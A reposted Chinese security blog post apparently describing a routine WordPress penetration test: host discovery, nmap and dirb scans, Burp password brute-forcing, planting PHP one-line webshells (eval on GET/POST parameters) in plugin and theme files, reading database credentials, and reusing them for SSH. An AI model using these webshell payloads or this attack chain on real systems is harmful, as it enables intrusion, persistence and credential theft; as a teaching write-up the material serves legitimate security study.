将安全君呀设为"星标⭐️"
第一时间收到文章更新
声明: 安全君呀 公众号文章中的技术只做研究之用,禁止用来从事非法用途,如有使用文章中的技术从事非法活动,一切后果由使用者自负,与本公众号无关。
文章声明:本篇文章内容部分选取网络,如有侵权,请告知删除。
一、发现主机
在网络渗透测试中,首先需要确定目标网络中的活跃主机。这可以通过使用多种工具来实现,例如:
-
arp-scan:用于扫描局域网内的ARP请求,以发现在线的主机。 -
netdiscover:通过被动监听网络流量来发现网络上的设备。 -
fping:发送ICMP ECHO_REQUEST包来发现网络上的主机。
二、端口扫描
发现主机后,下一步是扫描这些主机上开放的端口,以识别可能的攻击面。常用的工具包括:
-
nmap:一个强大的网络扫描工具,可以用于发现开放的端口、运行的服务及其版本。
三、目录扫描
在识别了开放端口后,可以对Web服务器进行目录扫描,以发现潜在的敏感目录或文件。Dirb是一个常用的工具:
-
Dirb:一个用于Web服务器目录枚举的工具,可以帮助发现隐藏的Web应用程序目录。
四、账号密码破解
一旦识别了登录页面,可以使用Burp Suite等工具来捕获登录请求,并尝试破解账号密码:
-
Burp Suite:一个集成的Web安全测试工具,可以用于拦截、修改和重放网络请求。
用户名在登陆页面得到认证,可以使用单个payload爆破密码:
五、上传WebShell
成功破解账号密码后,可以上传WebShell以维持对目标系统的控制。这可以通过以下方式实现:
-
插件上传
-
GET WebShell:通过构造特定的GET请求,将WebShell上传到目标服务器。 -
POST WebShell:通过构造POST请求,将WebShell上传到目标服务器。 -
GET一句话木马: -
-
POST一句话木马:
-
-
-
-
主题上传
-
使用POST WebShell:通过WordPress等CMS的主题上传功能,上传包含WebShell的主题文件。 -
保留WebShell:确保WebShell在上传后能够正常执行命令。 -
使用Burp Suite执行命令:通过Burp Suite的Intruder功能,可以对WebShell发送命令。
-
使用POST一句话木马:
保留一句话木马:
BP执行命令:
使用GET一句话木马:
六、数据库连接
通过WebShell,可以连接到数据库并执行SQL查询:
-
蚁剑:一个PHP开发的WebShell客户端,可以用于连接和操作数据库。 -
查看数据库配置文件:通过WebShell访问数据库配置文件,获取数据库用户和密码。 -
连接数据库:使用获取的凭据连接到数据库,并执行SQL查询。
蚁剑连接POST一句话木马:
查看数据库配置文件:
查看sql配置文件,找到用户密码,连接到数据库:
七、SSH远程登录
如果获得了SSH访问权限,可以进行远程登录:
-
SSH登录:使用获取的用户名和密码,通过SSH客户端远程登录到目标系统。 -
登录成功:一旦登录成功,就可以执行更多的命令和操作。
考虑密码复用,ssh远程登录:
渗透测试过程:
1、找 IP
arp-scan -l、netdiscover、fping
| arp-scan -l
|
2、扫描端口
| nmap -p- IP
3、扫描目录
| dirb http://IP
4、账号密码爆破
| 从端口和目录浏览中发现wordpress登录页面,用户名在登陆页面得到认证,可以使用单个payload爆破密码
5、写入一句话木马
在插件和主题处写入
GET一句话木马
| 找个php文件,写入
| <?php eval($_GET[123]);?>
| 找到该php文件的路径,在浏览器搜索框中输入
| ?123=system(id);
|
POST一句话木马
| php文件中写入:
| <?php eval($_POST[123]);?>
| 蚁剑连接,或者BP拦截,修改发送请求为POST,最后写上
| 123=system(id);
| 发送
6、连接SQL,密码复用
| 蚁剑连接POST一句话木马,查看数据库配置文件,找到用户和密码,使用蚁剑连接数据库。
| 考虑数据库密码复用,尝试ssh远程登录。
Tips
欢迎大家在下面点赞评论加关注,让我们一起在网安之路越走越远!!!
原文始发于微信公众号(安全君呀):一次很大众的渗透测试过程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论